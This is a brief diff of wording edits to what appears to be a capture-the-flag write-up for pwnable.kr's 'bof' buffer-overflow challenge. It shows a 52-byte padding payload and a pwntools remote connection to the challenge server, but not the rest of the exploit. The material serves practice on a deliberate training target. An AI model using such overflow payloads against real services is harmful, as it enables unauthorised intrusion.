Pwnable.kr - bof

 .

-First we build our payload the same way as earlier:
+First, we build our payload the same way we did manually:

 1 | payload = b"\x41"*52 |

-Then we just forward it to the server and open an interactive session:
+Then we just send it to the server and open an interactive session:

 1 | io = remote('pwnable.kr', 9000) |